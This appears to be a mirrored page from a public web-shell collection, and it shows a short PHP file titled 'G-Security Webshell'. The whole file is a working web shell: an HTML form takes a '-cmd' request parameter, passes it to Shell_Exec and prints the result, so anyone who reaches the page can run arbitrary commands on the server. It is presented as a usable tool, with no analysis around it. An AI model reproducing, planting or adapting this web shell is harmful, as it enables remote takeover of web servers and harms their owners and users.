mirror of
https://github.com/tennc/webshell
synced 2024-11-22 19:23:05 +00:00
19 lines
335 B
Text
19 lines
335 B
Text
|
<html>
|
||
|
<head>
|
||
|
<title>G-Security Webshell</title>
|
||
|
</head>
|
||
|
|
||
|
<body bgcolor=#000000 text=#ffffff ">
|
||
|
<form method=POST>
|
||
|
<br>
|
||
|
<input type=TEXT name="-cmd" size=64 value="<?=$cmd?>"
|
||
|
style="background:#000000;color:#ffffff;">
|
||
|
<hr>
|
||
|
<pre>
|
||
|
<? $cmd = $_REQUEST["-cmd"];?>
|
||
|
<? if($cmd != "") print Shell_Exec($cmd);?>
|
||
|
</pre>
|
||
|
</form>
|
||
|
</body>
|
||
|
</html
|